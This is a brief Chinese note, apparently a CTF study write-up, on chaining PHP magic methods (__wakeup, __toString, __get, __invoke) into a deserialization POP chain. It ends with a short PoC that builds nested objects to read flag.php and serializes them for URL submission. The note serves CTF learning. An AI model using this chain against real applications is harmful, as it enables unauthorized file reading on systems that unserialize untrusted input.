构造pop链

反序列化视频笔记

第一步:找到目标触发echo调用$flag

第二步:触发_invoke函数调用appeng函数$var=flag.php(把对象当成函数)

第三步:给$p赋值为对象,即function成为对象Modifier却被当成函数调用,触发Modifier中的_invoke函数

第四步:触发get(调用不存在的成员属性)

第五步:给$str赋值为对象Test中不存在的成员属性source,则可触发Test里的成员方法get

第六步:触发_tostring(把对象当成字符串)

第七步:给source赋值为对象show,当字符串被echo调用触发_tostring

第八步:反序列化触发_wakeup。

所以构造poc、

私有属性var只能在里面构造var=flag.php

$mod=new modifier();

$tes=new test();

tes -\>p=mod;

$show =new show();

show -\> source=show;

show -\>str=tes;

echo serialize($show);

记得私有属性的方块要变成%00

url提交

相关推荐
摸鱼也很难20 天前
php从入门到进阶笔记 下 &&php反序列化漏洞的演示
开发语言·笔记·php·php反序列化
网安小t3 个月前
ctfshow-PHP反序列化
网络安全·渗透测试·反序列化漏洞·php反序列化·漏洞测试
Smile灬凉城6663 个月前
PHP-SER-libs靶场通关(1-9)
运维·安全·php反序列化
月敛苏时意6 个月前
php反序列化漏洞简介
php反序列化
LLINELL7 个月前
PHP序列化、反序列化
php·php反序列化
网安小t1 年前
ctfshow反序列化(web254-web266)
网络安全·渗透测试·反序列化漏洞·php反序列化
补天阁1 年前
反序列化提升刷题
web安全·信息安全·php反序列化·反序列化刷题提升·一招带你入门反序列化
kali-Myon1 年前
NewStarCTF2023week4-More Fast(GC回收)
web安全·php·1024程序员节·pop链·gc回收·php反序列化